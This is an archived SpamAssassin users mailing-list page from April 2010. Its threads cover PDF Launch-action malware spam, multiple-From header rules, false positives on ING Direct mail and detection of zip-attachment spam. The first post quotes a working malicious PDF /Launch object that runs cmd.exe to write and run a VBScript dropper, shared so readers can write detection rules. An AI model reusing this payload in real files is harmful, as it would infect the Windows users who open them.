score HTML_IMAGE_ONLY_02 1.978
score HTML_IMAGE_ONLY_04 2.087
score HTML_IMAGE_ONLY_06 1.228
score HTML_IMAGE_ONLY_08 0.984
score HTML_IMAGE_ONLY_10 0.843
score HTML_IMAGE_ONLY_12 0.487
score EMAIL_ATTRIBUTION -1
score MSGID_GOOD_EXCHANGE -1

# Reports
clear_report_template
report Diese 

new PDF Launch malware exploit (with sample)

2010-04-28 Thread Chip M.
About a month ago, Didier Stevens found a nifty way to exploit
PDFs, using their launch action.

Original article:
http://blog.didierstevens.com/2010/03/29/escape-from-pdf/
More info:
http://www.sophos.com/blogs/sophoslabs/?p=9301

Yesterday morning, several of these showed up in my feeds.
Sample:
http://puffin.net/software/spam/samples/0007_pdf_mal.txt


The bad news is that the social engineering part is well written
(terse with decent grammer in the body) and feels like the sort of
thing that would confuse/fool naive endusers.

Based on which accounts they're hitting, these may have been
created by last year's inline-PNG/RTF guy (who I'm pretty sure
is behind the recent zipped JPEG and now RTF campaigns).
If that's correct, we should expect more attacks.  He's smarter
AND more patient than pretty much all other spammers (he might
even be as smart as a tree squirrel - scary!).


The good news is there's all manner of easy to detect stuff that
shouldn't occur in normal PDFs. :)

Here's just the nifty Launch part (NOTE: for skimming clarity, I
removed several blank lines from around the original Click line):

8 0 obj

 /Type /Action
 /S /Launch
 /Win
 
  /F (cmd.exe)
  /P (/c echo Set fso=CreateObject(Scripting.FileSystemObject)  script.vbs 
 echo Set f=fso.OpenTextFile(doc.pdf, 1, True)  script.vbs  echo 
pf=f.ReadAll   script.vbs  echo s=InStr(pf,'SS)   script.vbs  echo 
e=InStr(pf,'EE)   script.vbs  echo s=Mid(pf,s,e-s)   script.vbs  echo 
Set z=fso.OpenTextFile(batscript.vbs, 2, True)   script.vbs  echo s = 
Replace(s,%,)  script.vbs  echo z.Write(s)  script.vbs  script.vbs 
 batscript.vbs
Click the open button to view this document:)
 

endobj


I haven't seen any since the first blast, so I suspect their
signatures were widely distributed by most anti-virus orgs.

I'm mainly publishing this for all of us who like to have backup
rules, and are willing to be more general than the sometimes too
tightly focused malware sigs.

For example, I've added script.vbs to my instant-death PDF word
scans.

I'll be asking some of my most diverse volunteers to run some
ham-PDF-only MassChecks tonight, and see if any of my new rules
mis-fire.  Given the number of times HTML naughty tags appear in
ham, I will resist assuming my reasonable restrictions won't hit
any.
- Chip





RE: new PDF Launch malware exploit (with sample)

2010-04-28 Thread Rosenbaum, Larry M.
Please don't send live malware samples to the list.

 -Original Message-
 From: Chip M. [mailto:sa_c...@iowahoneypot.com]
 Sent: Wednesday, April 28, 2010 2:01 PM
 To: users@spamassassin.apache.org
 Subject: new PDF Launch malware exploit (with sample)
 
 FILE QUARANTINED
 
 Microsoft Forefront Security for Exchange Server removed a file since
 it was found to be infected.
 File name: Body of Message
 Virus name: TrojanDropper:Win32/Pidrop.A


Re: new PDF Launch malware exploit (with sample)

2010-04-28 Thread Benny Pedersen

On ons 28 apr 2010 20:01:29 CEST, Chip M. wrote


About a month ago, Didier Stevens found a nifty way to exploit
PDFs, using their launch action.


when you get more add them here http://www.clamav.net/

--
xpoint http://www.unicom.com/pw/reply-to-harmful.html



RE: new PDF Launch malware exploit (with sample)

2010-04-28 Thread d . hill

Quoting Rosenbaum, Larry M. rosenbau...@ornl.gov:


Please don't send live malware samples to the list.


Um... The OP did not send malware to the list. A link was supplied to  
the original message. You must have a scanner set up to follow links.  
That isn't a good idea, in my opinion.



-Original Message-
From: Chip M. [mailto:sa_c...@iowahoneypot.com]
Sent: Wednesday, April 28, 2010 2:01 PM
To: users@spamassassin.apache.org
Subject: new PDF Launch malware exploit (with sample)

FILE QUARANTINED

Microsoft Forefront Security for Exchange Server removed a file since
it was found to be infected.
File name: Body of Message
Virus name: TrojanDropper:Win32/Pidrop.A








Re: How many Froms?

2010-04-28 Thread Martin Gregorie
On Wed, 2010-04-28 at 12:41 -0400, Charles Gregory wrote:

 Occasionally I see an e-mail with multiple addresses on the 'From:' 
 header. (not the envelope)
 
Do these messages also contain a 'Sender:' header? According to RFC 822
they should do so.

 Can anyone think of legitimate uses for multiple From: addresses?
 Or could I just use a rule like:
 
See RFC822, which allows a message to have multiple authors. It also
says that if 'From:' lists more than one author then a 'Sender:' header
must be present and that the address in the 'Sender:' header need not
be one of thoise listed in the 'From:' header.

Having said that, I can't remember seeing multiple addresses on a From:
header or a Sender: header.


Martin




ING Direct mail FPing on TVD_ rules

2010-04-28 Thread Kris Deugau
I just received a mistagged-ham report from a customer showing two stock 
rules hit on a legitimate email from ING Direct - total score was 6.4, 
even with -3.5 from BAYES_00.  I've asked if I can pass the message on 
for analysis.


Stock scores:
score TVD_PH_SUBJ_ACCOUNTS_POST 2.602 2.607 2.497 3.099 # n=2
score TVD_SUBJ_ACC_NUM 0.001 2.199 2.199 2.198 # n=1

I've dropped them down like so:
score TVD_PH_SUBJ_ACCOUNTS_POST 1.1 1.1 1.0 1.5
score TVD_SUBJ_ACC_NUM 0.001 1.199 1.199 1.198 # n=1


The full set of hits (mostly stock rules, the ones that aren't have low 
advisory scores):


Content analysis details:   (6.4 points, 5.0 required)

 pts rule name  description
 -- 
--

 1.0 SUBJ_YOUR_DEBT Subject contains Your Bills or similar
 2.2 TVD_SUBJ_ACC_NUM   Subject has spammy looking monetary reference
 3.1 TVD_PH_SUBJ_ACCOUNTS_POST TVD_PH_SUBJ_ACCOUNTS_POST
-0.0 T_RP_MATCHES_RCVD  Envelope sender domain matches handover relay
domain
 0.1 PERSONAL_INFO_11   BODY: PERSONAL_INFO_11
-3.5 BAYES_00   BODY: Bayes spam probability is 0 to 1%
[score: 0.]
 0.0 HTML_MESSAGE   BODY: HTML included in message
 0.7 MIME_HTML_ONLY BODY: Message only has text/html MIME parts
 1.1 HTML_IMAGE_ONLY_16 BODY: HTML: images with 1200-1600 bytes of 
words

 0.0 TO_EQ_FM_HTML_ONLY To == From and HTML only
 0.0 TO_EQ_FM_DIRECT_MX To == From and direct-to-MX
 1.7 TO_EQ_FM_HTML_DIRECT   To == From and HTML only, direct-to-MX

-kgd


Re: ING Direct mail FPing on TVD_ rules

2010-04-28 Thread Michael Scheidell

On 4/28/10 3:13 PM, Kris Deugau wrote:

 0.0 TO_EQ_FM_HTML_ONLY To == From and HTML only
 0.0 TO_EQ_FM_DIRECT_MX To == From and direct-to-MX
 1.7 TO_EQ_FM_HTML_DIRECT   To == From and HTML only, direct-to-MX 

so.  its also obviously bulk email.

if img direct wants to be stupid about the emails they send, let them be 
blocked, or whitelist them.


(or they can pay return path for more credit points.. as long as their 
bulk email is double opt in)




--
Michael Scheidell, CTO
Phone: 561-999-5000, x 1259
 *| *SECNAP Network Security Corporation

   * Certified SNORT Integrator
   * 2008-9 Hot Company Award Winner, World Executive Alliance
   * Five-Star Partner Program 2009, VARBusiness
   * Best Anti-Spam Product 2008, Network Products Guide
   * King of Spam Filters, SC Magazine 2008

__
This email has been scanned and certified safe by SpammerTrap(r). 
For Information please see http://www.secnap.com/products/spammertrap/
__  


Re: How many Froms?

2010-04-28 Thread Frank Heydlauf
Hi,

On Wed, Apr 28, 2010 at 08:05:27PM +0100, Martin Gregorie wrote:
 Having said that, I can't remember seeing multiple addresses on a From:
 header or a Sender: header.

I have plenty of them in my mailfolder - but not formated in 
the way you thought about, regarding your cite of RFC822.

On Wed, Apr 28, 2010 at 12:41:52PM -0400, Charles Gregory wrote:
...
 Or could I just use a rule like:
 
 header From =~ /\...@.*\@/

This regex matches i.e.

From: u...@example.com u...@example.com 

which is a common auto expansion of many MUAs when 
no sender real-name is configured.
Just try on your on mailfolder.

-- 
Regards
Frank 


Re: How many Froms?

2010-04-28 Thread David B Funk
On Wed, 28 Apr 2010, Frank Heydlauf wrote:

 Hi,

 On Wed, Apr 28, 2010 at 08:05:27PM +0100, Martin Gregorie wrote:
[snip..]
  Or could I just use a rule like:
 
  header From =~ /\...@.*\@/

 This regex matches i.e.

 From: u...@example.com u...@example.com

 which is a common auto expansion of many MUAs when
 no sender real-name is configured.
 Just try on your on mailfolder.

There's an easy fix for that FP, just use the 'From:addr =~ '
varient of the header rule. That ignores the comment part
of the 'From:' address and only examines the stuff inside
the 'b...@blah.blah' part.

-- 
Dave Funk  University of Iowa
dbfunk (at) engineering.uiowa.eduCollege of Engineering
319/335-5751   FAX: 319/384-0549   1256 Seamans Center
Sys_admin/Postmaster/cell_adminIowa City, IA 52242-1527
#include std_disclaimer.h
Better is not better, 'standard' is better. B{


Re: Filtering zip spam

2010-04-28 Thread Chip M.
I'm seeing an increase in zip attachment spam, and hoped someone
could help me figure out why it isn't being properly tagged. Are
others seeing this? Is BAYES_99 being triggered or is it lower?

Alex, does Bayes understand/check INSIDE zips, at least for file
properties?  If not, then it is inherently limited (just in this
context), which is a big part of why this is such an effective
technique.  Adding that to Bayes should be relatively straight
forward, and should make zips less attractive to spammers.


The score is very low. Does someone have an idea of other
characteristics that I can flag on?

One simple approach is to score all small zips, then meta that
with other characteristics, like ANY blocklist hit, unusual
nation of origin, etc.

That's safer than outright blocking merely unusual nations, like
France. :)

That's how I first handled zips, a few years ago, and it's fairly
effective.  Small zips in ham are VERY unusual, and typically are
sent by more sophisticated users, so it may be viable to have a
Subject-based skip rule (again, via metas) that would cancel out
other tests.

To avoid FPs, I'm using the RealName-based rules I described almost
three years ago (I have several skip rules daisy-chained off
those - a good example of an anti-spam mechanism which turned into
a very effective anti-FP mechanism).
Note that all the current zips have incorrect RealNames.


Alex, as with all rules, it really depends on your ham ecology.
Feel free to share more info about yours (we need the equivalent
of the Geek Code for ham ecology!).  When you first started
posting, I briefly assumed you were a college student, then
gradually realized you have decent volume and diversity. :)


All of the recent zipped file campaigns look like the work of last
year's inline-PNG/RTF coder, so we could well be in for more
variants.

Using zips is an interesting delivery mechanism.  Most Windows
versions have easy means to open them, and there's an element of
novelty (even I was almost excited when the first zipped JPEG
arrived - followed by disappointment that it was merely a
standard wavy pharm).


Another approach I had been using was a (post-SA) test that
extracts all filenames, and just looks for any specified file
extension(s).

It worked, but that test was designed for malware detection, and
has VERY limited options.  There was no means of restricting it to
a zip containing just one small RTF and no other files, so my
initial rule would have mis-fired on anything with a mix of files.

I finally had my Kaylee Frye moment about two weeks ago, and
(in my post-SA filter (sorry, written in Object Pascal)) wrote a
brand new Zip Info module, similar to Image Info.

I designed it to expose far more info, and wrote the rules module
so I'd have far more control than was currently necessary.

As I mentioned in a post in January, I had noticed a consistent
value in an Image properties field which I was calculating, but
not (at the time) exporting.
I'm trying to avoid that mental kick moment. :)


SANITY CHECK please!
Here's what I'm currently exporting:

Entire zip:
- number of files
- compression ratio (i.e. across ALL files)

Per file:
- filename
- compression ratio
- file date

The only property I'm not currently doing anything with is the
individual file date.  I'm having my endusers log their ham data
for a few weeks, then I'll see if there's anything useful, ham vs
spam wise.  I predict ham will have a rich date range, and spam
will be mostly/entirely recent.  I may add a simple younger/older
than n days test, regardless, since when dealing with spammers,
Logic is often NOT the beginning of Wisdom. ;)


Implementing the basic properties extraction was trivial.
Thinking thru how I wanted to handle the rules was more of a
challenge. :)

Figured I'd share where I'm at, and pick the big brains. :)
- Chip

P.S.  I am also seriously considering adding the ability to extract
any specified file as a text or binary stream, with the text stream
defaulting to being fed to a domain extraction module.

It's not unreasonable for somebody to send a legit zipped RTF, so
content scanning would be good.  These spam RTFs in particular are
tiny (low overhead to extract) yet intensely spammy.




Re: [sa] Re: How many Froms?

2010-04-28 Thread Charles Gregory

On Wed, 28 Apr 2010, David B Funk wrote:

There's an easy fix for that FP, just use the 'From:addr =~ '
varient of the header rule. That ignores the comment part
of the 'From:' address and only examines the stuff inside
the 'b...@blah.blah' part.


Avoid FP, yes, but also avoid the live header that is triggering the rule, 
which was *not* formatted with 


I guess I'll just test for *3* '@'s

- C


Re: How many Froms?

2010-04-28 Thread Bowie Bailey
David B Funk wrote:
 On Wed, 28 Apr 2010, Frank Heydlauf wrote:

   
 Hi,

 On Wed, Apr 28, 2010 at 08:05:27PM +0100, Martin Gregorie wrote:
 
 [snip..]
   
 Or could I just use a rule like:

 header From =~ /\...@.*\@/
 
 This regex matches i.e.

 From: u...@example.com u...@example.com

 which is a common auto expansion of many MUAs when
 no sender real-name is configured.
 Just try on your on mailfolder.
 

 There's an easy fix for that FP, just use the 'From:addr =~ '
 varient of the header rule. That ignores the comment part
 of the 'From:' address and only examines the stuff inside
 the 'b...@blah.blah' part.
   

But it also only gives you the first email address...

-- 
Bowie


Re: ING Direct mail FPing on TVD_ rules - also TO_EQ_FROM root subrules

2010-04-28 Thread Kris Deugau

Michael Scheidell wrote:

On 4/28/10 3:13 PM, Kris Deugau wrote:

 0.0 TO_EQ_FM_HTML_ONLY To == From and HTML only
 0.0 TO_EQ_FM_DIRECT_MX To == From and direct-to-MX
 1.7 TO_EQ_FM_HTML_DIRECT   To == From and HTML only, direct-to-MX 

so.  its also obviously bulk email.


I don't know how these rules positively identify a message as bulk. 
Taking them at face value, they certainly represent not following 
best-practices.


checking  Hmm.  I'm not even sure how they fired; the From and To are 
bare email addresses, and most certainly do NOT match.  Those rules also 
seem to be relatively recent (within ~1 month), since my 
workstation/test system didn't have them until I ran sa-update.  Our 
live systems get updated much more frequently (SOUGHT rules daily, 
others usually as I roll out updates for local rules).


I don't see anything obviously wrong with the root From == To meta subrules:

header __TO_EQ_FROM_1   ALL =~ 
/\nFrom:[^\n]{0,80}?([^\n\s]+)?\n(?:[^\n]{1,100}\n)*To:[^\n]+\1/ism
header __TO_EQ_FROM_2   ALL =~ 
/\nTo:[^\n]{0,80}?([^\n\s]+)?\n(?:[^\n]{1,100}\n)*From:[^\n]+\1/ism


but they (_1 in this case) still match on:

From: mortga...@ingdirect.ca
To: u...@vianet.ca

   sometimes.  Eeep.  I tried a minimal hand-created test message, 
with a Received header, and those two lines above;  it didn't match.  I 
copy-pasted the customer's address, and it matched.  I replaced the 
domain, and it still matched.  I replace the username, and it failed to 
match.  There's nothing funky in a hex dump of the original header.


I really hope I can get permission from the customer to at least pass 
the original on to one of the SA devs;  copy-pasting the headers into an 
empty file, and slowly removing one at a time caused some very *odd* 
changes in behaviour.  For instance, removing the original Subject: line 
(or altering it in certain ways) apparently controlled whether the 
relevant subrule above matched or not, no matter *what* was in the To or 
From (mostly).


I managed to reduce it to a suitably-anonymized example: 
http://pastebin.com/X2ZUNAYM


I've tried that test message on four different SA3.3.1 systems (Centos 4 
and 5, 32bit, local RPM;  Centos 5 64-bit, local RPM;  Debian lenny 
64-bit, local scripted source install) and all four hit 
TO_EQ_FM_DIRECT_MX (implying one or the other of __TO_EQ_FROM_1 or 
__TO_EQ_FROM_2 hit).  As you can plainly see, To does *not* equal From 
on that message...


if img direct wants to be stupid about the emails they send, let them be 
blocked, or whitelist them.


(or they can pay return path for more credit points.. as long as their 
bulk email is double opt in)


Actually, it appeared to be a specific reminder to that specific 
customer (certainly something likely to be sent in bulk in the sense 
that they'll send quite a few of them, but not bulk in sense you seem 
to mean).


-kgd


Re: ING Direct mail FPing on TVD_ rules - also TO_EQ_FROM root subrules

2010-04-28 Thread Michael Scheidell



On 4/28/10 4:47 PM, Kris Deugau wrote:

Michael Scheidell wrote:

On 4/28/10 3:13 PM, Kris Deugau wrote:

 0.0 TO_EQ_FM_HTML_ONLY To == From and HTML only
 0.0 TO_EQ_FM_DIRECT_MX To == From and direct-to-MX
 1.7 TO_EQ_FM_HTML_DIRECT   To == From and HTML only, direct-to-MX 

so.  its also obviously bulk email.


I don't know how these rules positively identify a message as bulk. 
Taking them at face value, they certainly represent not following 
best-practices.


sorry, usually if the to and from are the same, its bulk. looks like the 
regex's are in need of tweaking.


the best way to do this is to open a bug on SA's bugzilla.  that way 
they can track it, vote on it, and will know when its fixed.


Now, if ING direct cared about about such things as SPF (yes, SPF is 
broken) but in this case you would whitelist_from_spf @ingdirect.com in 
local.cf and not worry about forgeries slipping through.


the to/from AND, HTML is because its only html, and 'direct to mx' means 
that you probaly did not see a second received header in the email. (so 
it was machine generated)


--
Michael Scheidell, CTO
Phone: 561-999-5000, x 1259
 *| *SECNAP Network Security Corporation

   * Certified SNORT Integrator
   * 2008-9 Hot Company Award Winner, World Executive Alliance
   * Five-Star Partner Program 2009, VARBusiness
   * Best Anti-Spam Product 2008, Network Products Guide
   * King of Spam Filters, SC Magazine 2008

__
This email has been scanned and certified safe by SpammerTrap(r). 
For Information please see http://www.secnap.com/products/spammertrap/
__  


Re: new PDF Launch malware exploit (with sample)

2010-04-28 Thread Yet Another Ninja

On 2010-04-28 20:01, Chip M. wrote:

I haven't seen any since the first blast, so I suspect their
signatures were widely distributed by most anti-virus orgs.

I'm mainly publishing this for all of us who like to have backup
rules, and are willing to be more general than the sometimes too
tightly focused malware sigs.

For example, I've added script.vbs to my instant-death PDF word
scans.


If you still have PDFinfo in your plugin collection:

https://svn.apache.org/repos/asf/spamassassin/trunk/rulesrc/sandbox/axb/20_axb_pdf.cf

should hit on these in case AVs don't






[Copfilter] Copy of quarantined email - *** SPAM *** [8.9/7.0] ING Direct mail FPing on TVD_ rules

2010-04-28 Thread babedh-d...@biggdog.biz
I just received a mistagged-ham report from a customer showing two stock 
rules hit on a legitimate email from ING Direct - total score was 6.4, 
even with -3.5 from BAYES_00.  I've asked if I can pass the message on 
for analysis.

Stock scores:
score TVD_PH_SUBJ_ACCOUNTS_POST 2.602 2.607 2.497 3.099 # n=2
score TVD_SUBJ_ACC_NUM 0.001 2.199 2.199 2.198 # n=1

I've dropped them down like so:
score TVD_PH_SUBJ_ACCOUNTS_POST 1.1 1.1 1.0 1.5
score TVD_SUBJ_ACC_NUM 0.001 1.199 1.199 1.198 # n=1


The full set of hits (mostly stock rules, the ones that aren't have low 
advisory scores):

Content analysis details:   (6.4 points, 5.0 required)

  pts rule name  description
 -- 
--
  1.0 SUBJ_YOUR_DEBT Subject contains Your Bills or similar
  2.2 TVD_SUBJ_ACC_NUM   Subject has spammy looking monetary reference
  3.1 TVD_PH_SUBJ_ACCOUNTS_POST TVD_PH_SUBJ_ACCOUNTS_POST
-0.0 T_RP_MATCHES_RCVD  Envelope sender domain matches handover relay
 domain
  0.1 PERSONAL_INFO_11   BODY: PERSONAL_INFO_11
-3.5 BAYES_00   BODY: Bayes spam probability is 0 to 1%
 [score: 0.]
  0.0 HTML_MESSAGE   BODY: HTML included in message
  0.7 MIME_HTML_ONLY BODY: Message only has text/html MIME parts
  1.1 HTML_IMAGE_ONLY_16 BODY: HTML: images with 1200-1600 bytes of 
words
  0.0 TO_EQ_FM_HTML_ONLY To == From and HTML only
  0.0 TO_EQ_FM_DIRECT_MX To == From and direct-to-MX
  1.7 TO_EQ_FM_HTML_DIRECT   To == From and HTML only, direct-to-MX

-kgd



[Copfilter] Copy of quarantined email - *** SPAM *** [8.9/7.0] Re: How many Froms?

2010-04-28 Thread babedh-d...@biggdog.biz
On Wed, 28 Apr 2010, Frank Heydlauf wrote:

 Hi,

 On Wed, Apr 28, 2010 at 08:05:27PM +0100, Martin Gregorie wrote:
[snip..]
  Or could I just use a rule like:
 
  header From =~ /\...@.*\@/

 This regex matches i.e.

 From: u...@example.com u...@example.com

 which is a common auto expansion of many MUAs when
 no sender real-name is configured.
 Just try on your on mailfolder.

There's an easy fix for that FP, just use the 'From:addr =~ '
varient of the header rule. That ignores the comment part
of the 'From:' address and only examines the stuff inside
the 'b...@blah.blah' part.

-- 
Dave Funk  University of Iowa
dbfunk (at) engineering.uiowa.eduCollege of Engineering
319/335-5751   FAX: 319/384-0549   1256 Seamans Center
Sys_admin/Postmaster/cell_adminIowa City, IA 52242-1527
#include std_disclaimer.h
Better is not better, 'standard' is better. B{



Re: Filtering zip spam

2010-04-28 Thread Alex
Hi,

 Alex, does Bayes understand/check INSIDE zips, at least for file
 properties?  If not, then it is inherently limited (just in this

I'm not sure if you're asking me rhetorically here. I really don't
know. Is it enough that bayes finds the encoded string as the
attachment, and matches that against other strings or must it be
expanded first into its real content?

 context), which is a big part of why this is such an effective
 technique.  Adding that to Bayes should be relatively straight
 forward, and should make zips less attractive to spammers.

Almost too obvious of an addition makes me wonder why it hasn't
previously been done.

 One simple approach is to score all small zips, then meta that
 with other characteristics, like ANY blocklist hit, unusual
 nation of origin, etc.

That's a good one. I'm not sure I'm at the point of writing rules to
match on attachment size, however.

 That's how I first handled zips, a few years ago, and it's fairly
 effective.  Small zips in ham are VERY unusual, and typically are

Again, very obvious after you mention it that I'm surprised it's not
in the default rules if you've been doing it for a while. Is there
some side-effect or drawback that would prevent it from being rolled
into a real SA release?

 To avoid FPs, I'm using the RealName-based rules I described almost
 three years ago (I have several skip rules daisy-chained off

I'll have to locate those. Not much luck finding it after a quick
search. It's not the Google I'm feeling lucky discussion, right?

# Is this even still relevant?
http://old.nabble.com/Googlepages---Livefilestore-spams-td14715808.html

 Alex, as with all rules, it really depends on your ham ecology.

I agree to an extent, but there is a common reference point that we
all have, and I'd like to at least find that.

 Feel free to share more info about yours (we need the equivalent
 of the Geek Code for ham ecology!).  When you first started
 posting, I briefly assumed you were a college student, then
 gradually realized you have decent volume and diversity. :)

I appreciate that. I've been working with Linux since the beginning
but not a real perl programmer.

 As I mentioned in a post in January, I had noticed a consistent
 value in an Image properties field which I was calculating, but
 not (at the time) exporting.

Is this it?

# Re: pill image spam learns to walk
http://marc.info/?l=spamassassin-usersm=126327771510366w=2

Is there any progress on your work from that, which might benefit us here?

 Entire zip:
    - number of files
    - compression ratio (i.e. across ALL files)

Isn't this what the clamav and sanesecurity sigs are for?

Thanks,
Alex